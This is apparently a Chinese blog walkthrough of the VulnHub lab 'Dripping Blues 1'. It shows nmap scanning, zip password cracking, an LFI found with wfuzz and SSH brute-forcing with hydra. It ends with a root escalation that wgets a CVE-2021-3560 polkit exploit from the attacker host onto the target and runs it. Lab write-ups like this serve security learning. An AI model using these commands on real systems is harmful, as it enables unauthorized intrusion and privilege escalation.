**声明:**文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究
靶机信息
下载地址:
https://www.vulnhub.com/entry/dripping-blues-1,744/
难度: 简单
发布时间: 2021年9月19日
提示信息:
Get flags
信息收集
扫描主机
nmap -sP 192.168.7.1/24
扫描端口
nmap -sC -sV -p- 192.168.7.251 -oN Dripping-Blues-1.nmap
通过nmap扫描,结果可以看到21端口的ftp服务可以匿名访问目录下有一个名为respectmydrip.zip的压缩包,80端口下面扫到robots.txt文件,还有一个22端口.
先从ftp开始下手
ftp Anonymous@192.168.7.251
提示输入密码直接回车
ls
可以看到respectmydrip.zip文件,我们下载他然后回到本地查看文件
get respectmydrip.zip
exit
ZIP密码暴破
回到本地,打开当前目录文件夹,双击压缩包看一下包里有什么
open .
打开压缩包后里面有两个文件,一个是respectmydrip.txt这是个带有密码保护的文件,还有一个不需要密码的secret.zip压缩包,先把secret.zip拖出来打开
可以看到里面有个secret.txt文件同样是受密码保护的,这样就先从zip密码破解开始吧
zip2john respectmydrip.zip >> passrespectmydrip.txt
john passrespectmydrip.txt
成功暴出密码072528035解压压缩包看看文件内容是什么
unzip respectmydrip.zip
ls
cat respectmydrip.txt
文件内只提到drip目前看没什么头绪,看记下来
再来破解另一个压缩包
zip2john secret.zip >> passsecret.txt
john passsecret.txt
Web渗透
趁着zip密码暴破时我们浏览下网站信息
这里提到travisscott和thugger把他记下来,再看下robots.txt
http://192.168.7.251/robots.txt
里面有一个文件和一个页面,先看下文件内容
这里信息量有点大,列出来看
hello dear hacker wannabe,
go for this lyrics:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
count the n words and put them side by side then md5sum it
ie, hellohellohellohello >> md5sum hellohellohellohello
it's the password of ssh
首先提到了一个网址www.azlyrics.com/lyrics/youn…
然后让我们数一数歌词里有几个单词,并排放置然后md5sum运算
还告诉我们方法:hellohellohellohello >> md5sum hellohellohellohello
并且得到的结果就是ssh的密码
提示信息就这些,去看看网址
先让我们把单词提取出来
cewl https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html -w pass.txt
cat pass.txt
这里说一下,我的网络提取不到单词,科学 上网后才行,并且有广告页面的关系他会不停的变换页面,这时手动停止即可( Ctrl+C )
拿到字典,按他说的,排成一行,然后md5sum运算
用kali自带的文本工具打开pass.txt 然后替换换行为空
md5sum pass.txt
70485ef82356e3fa6570435c810bf7a1
怎么感觉这里解的不对~~~~
按之前的提示已经拿到密码了,现在去暴破ssh吧,至于用户名,就用我们之前记录的那些提示
cat notes.txt
SSH暴破
hydra -L notes.txt -p 70485ef82356e3fa6570435c810bf7a1 ssh://192.168.7.251
果然没解出来,方法不对
再找找其其他信息,记得robots.txt文件里面还提到了/etc/dripispowerful.html,但是访问是个无效页面
目录扫描
我们扫下目录看看
gobuster dir -w ../../Dict/SecLists-2021.4/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.7.251 -x php,html,txt,zip
只有一个index.php,就是我们访问的首页,走到这里已经没路了
这里提到driftingblues被hack入侵了,那么入侵会不会留下后门
换个后门字典再做一次目录扫描
gobuster dir -w ../../Dict/SecLists-2021.4/Web-Shells/backdoor_list.txt -u http://192.168.7.251 -x .php,.html,.txt,.zip
还是只有index.php,那会不会后门就是这个文件,robots.txt里还提到/etc/dripispowerful.html有目录有文件不可能无法访问,之前有个靶机后门就是本地文件包含,这个会不会也是,拿来测试下
wfuzz -c -w ../../Dict/fuzzDicts/paramDict/php.txt -u http://192.168.7.251/index.php?FUZZ=/etc/dripispowerful.html|grep -v "138 Ch"
试了几个字典终于猜对了,不过这个drip之前有提示过,竟然是用在这里的(老外的脑子怎么想的),访问看看
http://192.168.7.251/index.php?drip=/etc/dripispowerful.html
加载了一张图片,源码里多了些内容,是个密码imdrippinbiatch那就拿密码来暴破ssh,帐号还是用之前的notes.txt
hydra -L notes.txt -p imdrippinbiatch ssh://192.168.7.251
拿到帐号thugger(其实不用暴破也可以,靶机登录界面上就有帐号,这里只是演示如何猜解帐号)
现在可以登录ssh了
ssh thugger@192.168.7.251
输入密码imdrippinbiatch
登录成功,看下有什么能利用的信息
sudo 没权限 suid也没有可利用的东西,用户目录下倒是拿到了用户flag
ls
cat user.txt
5C50FC503A2ABE93B4C5EE3425496521
这是个md5,找个地方解一下
toomanydrip
在这里尝试了多种方法都没找到可利用的信息,
于是在搜索引擎上输入ubuntu 20.04 提权,在测试多个提权工具无效后终于找到一个可用的
权限提升
CVE-2021-3560 提权
原理:当一个命令被发送到目标程序处理时,消息发送方会被分配一个唯一总线名称(感觉有点像sessionid的意思)。当需要polkit去做权限校验时,polkit会通过唯一总线名称去查询命令发送方的UID,如果此时唯一总线名称已经不存在了,polkit错误的处理了这种情况,默认UID为0即root用户的UID。
github上找个exp
下载exp,本地和靶机用wget都无法下载,于是我科学 上网后在kali上下载,再传到靶机上
kali上:
wget https://raw.githubusercontent.com/Almorabea/Polkit-exploit/main/CVE-2021-3560.py
python3 -m http.server
靶机上:
wget http://192.168.7.3/CVE-2021-3560.py
开始提权
python3 CVE-2021-3560.py
提权成功,看下root目录下的flag
cd /root
ls
cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8
OK游戏结束,今天的靶机是按群友要求做的,其实前两天我就下载好了,开机后发现是CTF类型的我便放弃了,毕竟不擅长CTF,同样这个靶机歌词部分没解出来,甚至secret.zip到文章结束都没暴破出来密码,水平太差还要继续学习,这两个部分有大佬解出来的还请指点一下,今天就到这里吧,小伙伴们明天见.
这篇文章到这里就结束了,喜欢打靶的小伙伴可以关注"伏波路上学安全"微信公众号,或扫描下面二维码关注,我会持续更新打靶文章,让我们一起在打靶中学习进步吧.
